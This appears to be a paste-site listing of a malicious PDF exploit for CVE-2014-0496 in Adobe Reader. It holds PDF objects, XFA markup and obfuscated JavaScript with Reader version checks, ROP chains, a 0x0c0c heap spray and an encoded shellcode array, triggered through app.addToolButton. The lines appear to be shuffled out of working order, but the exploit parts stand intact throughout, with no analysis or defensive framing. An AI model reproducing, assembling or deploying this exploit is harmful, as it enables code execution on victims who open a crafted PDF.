physicaldrive0

CVE-2014-0496 Adobe Pdf Exploit ToolButton

Sep 5th, 2014
  1. @PhysicalDrive0
  2.  
  3. });
  4. 1 0 obj
  5. 2 0 obj
  6. 3 0 obj
  7. 4 0 obj
  8. 5 0 obj
  9. 6 0 obj
  10. 7 0 obj
  11. aaa += aaa;
  12. aa=dd13.split("%u");
  13. aa[i]=str12+aa[i];
  14. /AcroForm 6 0 R
  15. addButtonFunc = function () {
  16. af1="aaaaa%aaaaaaaauaaaaaa";
  17. af1=af1[("112","a2s1","replace")](/a/g,'');
  18. app.addToolButton({
  19. app.addToolButton({
  20. app.alert('123');
  21. app.removeToolButton({
  22. as1211();
  23. bbb += aaa;
  24. bbb = bbb.substring(0, i11 / 2);
  25. bbb += sa;
  26. bbb += str;
  27. break;
  28. ccc += ccc;
  29. cEnable: "addButtonFunc();"
  30. cEnable: "removeButtonFunc();"
  31. cExec: "1",
  32. cExec: "1",
  33. cName: "evil"
  34. cName: "evil",
  35. cName: "xxx",
  36. </config>
  37. <config xmlns="http://www.xfa.org/schema/xci/2.6/">
  38. /Count 1
  39. dd13=aa.join('%u');
  40. dd13=af1+dd13;
  41. dd13=xx13.join('%u');
  42. } else {
  43. } else if (app.viewerVersion >= 10 && app.viewerVersion < 11 && app.viewerVersion <= 10.106) {
  44. } else if (app.viewerVersion >= 11 && app.viewerVersion <= 11.002) {
  45. endobj
  46. endstream
  47. for (i = 0; i < 0x1c / 2; i++) part1 += this[un12]("%u4141");
  48. for (i = 0; i < 0x1e0 + 0x10; i++) eee[i] = ddd + "s";
  49. for (i = 0; i < 10; i++) arr[i] = part1.concat(part2);
  50. for (i = 0; i < aa[tt1]; i++)
  51. for (i = 0; i < part2_len / 2 - 1; i++) part2 += this[un12]("%u4141");
  52. function as1211()
  53. function heapSpray(str, str_addr, r_addr) {
  54. function opp12(xx13)
  55. heapSpray(payload, ret_addr, r_addr);
  56. if (app.viewerVersion >= x11 && app.viewerVersion < 10 && app.viewerVersion <= 9.504) {
  57. if(ccc[tt] >= (0x40000*2))
  58. if(j)
  59. if (!r11) {
  60. if (vulnerable) {
  61. j=4-aa[i][tt1];
  62. /Kids [3 0 R]
  63. <</Length 10074>>
  64. <</Length 372>>
  65. obj_size = 0x330 + 0x1c;
  66. obj_size = 0x360 + 0x1c;
  67. obj_size = 0x370;
  68. /OpenAction 4 0 R
  69. /Pages 2 0 R
  70. <pageSet></pageSet>
  71. /Parent 2 0 R
  72. part1 += rop_addr;
  73. %%%%%PDF-6.5
  74. PE/%%%%%%
  75. <present><pdf><interactive>1</interactive></pdf></present>
  76. r11 = true;
  77. r_addr = 0x08a8;
  78. r_addr = 0x08e4;
  79. r_addr = 0x08e8;
  80. removeButtonFunc = function () {
  81. ret_addr = this[un12]("%u8003%u4a84");
  82. ret_addr = this[un12]("%ua83e%u4a82");
  83. ret_addr = this[un12]("%ua8df%u4a82");
  84. return;
  85. return dd13;
  86. rop_addr = this[un12]("%u08a8%u0c0c");
  87. rop_addr = this[un12]("%u08e4%u0c0c");
  88. rop_addr = this[un12]("%u08e8%u0c0c");
  89. rop = rop10;
  90. rop = rop11;
  91. rop = rop9;
  92. <</Size 8/Root 1 0 R>>
  93. str12=new Array(j+1).join("0");
  94. stream
  95. <subform name="form1" layout="tb" locale="en_US">
  96. </subform></template></xdp:xdp>
  97. <template xmlns="http://www.xfa.org/schema/xfa-template/2.6/">
  98. trailer
  99. tt1=tt1[("112","a2s1","replace")](/a/g,'');
  100. tt=tt[("112","a2s1","replace")](/a/g,'');
  101. /tYPE/aCTION/S/JavaScript/JS 5 0 R>>
  102. /type /Page
  103. /Type /Page
  104. /Type /Pages
  105. un12='';
  106. un12=un12[("112","as1","replace")](/w/g,'');
  107. un12="uwnwwewwwswcwwwawwpwe";
  108. var aaa = this[un12]("%u0c0c");
  109. var arr = new Array();
  110. var bbb = aaa.substring(0, i1 / 2);
  111. var ccc = bbb.substring(0, i2 / 2);
  112. var ddd = ccc.substring(0, 0x80000 - i3);
  113. var eee = new Array();
  114. var executable = "";
  115. var i11 = 0x0c0c - 0x24;
  116. var i1 = r_addr - 0x24;
  117. var i2 = 0x4000 + 0xc000;
  118. var i3 = (0x1020 - 0x08) / 2;
  119. var obj_size;
  120. var part1 = "";
  121. var part2 = "";
  122. var part2_len = obj_size - part1[tt1] * 2;
  123. var payload = rop + shellcode;
  124. var r11 = false;
  125. var r_addr;
  126. var ret_addr;
  127. var rop;
  128. var rop10 = this[("123","1a1",un12)](opp12(xx132));
  129. var rop11 = this[("123","1a1",un12)](opp12(xx131));
  130. var rop9 = this[("123","1a1",un12)](opp12(xx133));
  131. var rop_addr;
  132. var sa = str_addr;
  133. var shellcode = this[("123","1a1",un12)](opp12(xx134));
  134. var tt1="alaaeaanaaagataaah";
  135. var tt="alaaeaanaagataah";
  136. var vulnerable = true;
  137. var xx131=new Array(0x822c.toString(16),0x4a85.toString(16),0xf129.toString(16),0x4a82.toString(16),0x597f.toString(16),0x4a85.toString(16),0x6038.toString(16),0x4a86.toString(16),0xf1d5.toString(16),0x4a83.toString(16),0xffff.toString(16),0xffff.toString(16),0x0000.toString(16),0x0000.toString(16),0x0040.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x1000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x5093.toString(16),0x4a85.toString(16),0xbc12.toString(16),0x2946.toString(16),0x0030.toString(16),0x4a85.toString(16),0x597f.toString(16),0x4a85.toString(16),0x0031.toString(16),0x4a85.toString(16),0x8a79.toString(16),0x81ea.toString(16),0x822c.toString(16),0x4a85.toString(16),0xf1d5.toString(16),0x4a83.toString(16),0xd4f8.toString(16),0x4a85.toString(16),0x6030.toString(16),0x4a86.toString(16),0x4864.toString(16),0x4a81.toString(16),0x0026.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x4856.toString(16),0x4a81.toString(16),0x05a0.toString(16),0x4a85.toString(16),0x0bc4.toString(16),0x4a86.toString(16),0x05a0.toString(16),0x4a85.toString(16),0xc376.toString(16),0x4a81.toString(16),0x63d0.toString(16),0x4a84.toString(16),0x0400.toString(16),0x0000.toString(16),0xd4f8.toString(16),0x4a85.toString(16),0xd4f8.toString(16),0x4a85.toString(16),0x4864.toString(16),0x4a81.toString(16));
  138. var xx132=new Array(0x6015.toString(16),0x4a82.toString(16),0xe090.toString(16),0x4a82.toString(16),0x007d.toString(16),0x4a82.toString(16),0x0038.toString(16),0x4a85.toString(16),0x46d5.toString(16),0x4a82.toString(16),0xffff.toString(16),0xffff.toString(16),0x0000.toString(16),0x0000.toString(16),0x0040.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x1000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x5016.toString(16),0x4a80.toString(16),0x420c.toString(16),0x4a84.toString(16),0x4241.toString(16),0x4a81.toString(16),0x007d.toString(16),0x4a82.toString(16),0x6015.toString(16),0x4a82.toString(16),0x0030.toString(16),0x4a85.toString(16),0xb49d.toString(16),0x4a84.toString(16),0x6015.toString(16),0x4a82.toString(16),0x46d5.toString(16),0x4a82.toString(16),0x4197.toString(16),0x4a81.toString(16),0x0026.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x4013.toString(16),0x4a81.toString(16),0xe036.toString(16),0x4a84.toString(16),0xa8df.toString(16),0x4a82.toString(16),0xadef.toString(16),0xd2fc.toString(16),0x0400.toString(16),0x0000.toString(16),0xb045.toString(16),0x55c8.toString(16),0x8b31.toString(16),0x4a81.toString(16),0x4197.toString(16),0x4a81.toString(16));
  139. var xx133=new Array(0x313d.toString(16),0x4a82.toString(16),0xa713.toString(16),0x4a82.toString(16),0x1f90.toString(16),0x4a80.toString(16),0x9038.toString(16),0x4a84.toString(16),0x7e7d.toString(16),0x4a80.toString(16),0xffff.toString(16),0xffff.toString(16),0x0000.toString(16),0x0000.toString(16),0x0040.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x1000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x155a.toString(16),0x4a80.toString(16),0x3a84.toString(16),0x4a84.toString(16),0xd4de.toString(16),0x4a82.toString(16),0x1f90.toString(16),0x4a80.toString(16),0x76aa.toString(16),0x4a84.toString(16),0x9030.toString(16),0x4a84.toString(16),0x4122.toString(16),0x4a84.toString(16),0x76aa.toString(16),0x4a84.toString(16),0x7e7d.toString(16),0x4a80.toString(16),0x3178.toString(16),0x4a81.toString(16),0x0026.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x3a82.toString(16),0x4a84.toString(16),0x6c5e.toString(16),0x4a84.toString(16),0x76ab.toString(16),0x4a84.toString(16),0xfec2.toString(16),0x2bca.toString(16),0x0400.toString(16),0x0000.toString(16),0xaab9.toString(16),0x6d5d.toString(16),0x7984.toString(16),0x4a81.toString(16),0x3178.toString(16),0x4a81.toString(16));
  140. var xx134=new Array(0x88bf.toString(16),0xcb87.toString(16),0xdb8d.toString(16),0xd9c8.toString(16),0x2474.toString(16),0x5df4.toString(16),0xc929.toString(16),0x44b1.toString(16),0x7d31.toString(16),0x0314.toString(16),0x147d.toString(16),0xed83.toString(16),0x6afc.toString(16),0x1272.toString(16),0xf166.toString(16),0xd1a4.toString(16),0xf15d.toString(16),0xc866.toString(16),0x8e2c.toString(16),0x25b9.toString(16),0xfb34.toString(16),0x85cb.toString(16),0x8d3e.toString(16),0x6d27.toString(16),0x6d36.toString(16),0x37b3.toString(16),0x06bf.toString(16),0x97bd.toString(16),0x2e34.toString(16),0x977a.toString(16),0x3b52.toString(16),0x7e89.toString(16),0x1262.toString(16),0x6092.toString(16),0x1f04.toString(16),0x4701.toString(16),0x94e1.toString(16),0xbb9f.toString(16),0xfe62.toString(16),0xbc37.toString(16),0x1475.toString(16),0x76cc.toString(16),0x636e.toString(16),0xa689.toString(16),0x988f.toString(16),0x93cd.toString(16),0xd5c6.toString(16),0x5726.toString(16),0x07d9.toString(16),0x9877.toString(16),0x17eb.toString(16),0xca84.toString(16),0x5788.toString(16),0x1401.toString(16),0x9850.toString(16),0x1be7.toString(16),0xcd95.toString(16),0x200c.toString(16),0x3565.toString(16),0x22c5.toString(16),0xbe74.toString(16),0xe94f.toString(16),0x2b77.toString(16),0x7a09.toString(16),0xe07b.toString(16),0x265d.toString(16),0xf798.toString(16),0x5c8a.toString(16),0x7ca4.toString(16),0x8b4d.toString(16),0xc62c.toString(16),0x576a.toString(16),0x054e.toString(16),0x6fc0.toString(16),0x5db9.toString(16),0x95ac.toString(16),0x9f30.toString(16),0xdbc7.toString(16),0x110d.toString(16),0xb6f4.toString(16),0xb279.toString(16),0xc8fb.toString(16),0x4585.toString(16),0x3346.toString(16),0x2bc1.toString(16),0xd991.toString(16),0x5446.toString(16),0x3a3d.toString(16),0xb2fb.toString(16),0xbdb0.toString(16),0xbd04.toString(16),0x0444.toString(16),0x29f3.toString(16),0xeb3b.toString(16),0xe823.toString(16),0xc0ab.toString(16),0xc411.toString(16),0x4f4f.toString(16),0x6b23.toStri
ng(16),0xfdf5.toString(16),0xd743.toString(16),0x0bd1.toString(16),0x01dd.toString(16),0xf34f.toString(16),0xc988.toString(16),0xc9f9.toString(16),0x6a63.toString(16),0x6f51.toString(16),0x30ce.toString(16),0x6c25.toString(16),0x1af5.toString(16),0xecc2.toString(16),0x650a.toString(16),0x87ed.toString(16),0xe19b.toString(16),0x784a.toString(16),0x700c.toString(16),0x1d0c.toString(16),0x1a8e.toString(16),0xb89f.toString(16),0xa97d.toString(16),0x982e.toString(16),0x110a.toString(16),0x1475.toString(16),0x4a82.toString(16),0x701d.toString(16),0xacb4.toString(16),0xe8fe.toString(16),0xfff9.toString(16),0xc9b8.toString(16),0x8d69.toString(16),0x672b.toString(16),0x194a.toString(16),0x5bdb.toString(16),0xbfaa.toString(16),0xec4b.toString(16),0x53cf.toString(16),0xdde0.toString(16),0x23c6.toString(16),0x39b4.toString(16),0xbac9.toString(16),0x73a4.toString(16),0xee3b.toString(16),0x2575.toString(16),0xf1e9.toString(16),0xf4aa.toString(16),0x5dcd.toString(16),0xa2b4.toString(16),0x41c5.toString(16));
  141. vulnerable = false;
  142. while (1)
  143. while ((aaa[tt] + 28) < (0x8000*2)) aaa += aaa;
  144. while (sa[tt] < (xxx - r_addr)) sa += sa;
  145. x11=9;
  146. <xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
  147. <</XFA 7 0 R>>
  148. <?xml version="1.0" encoding="UTF-8"?>
  149. xxx=0x0c0c;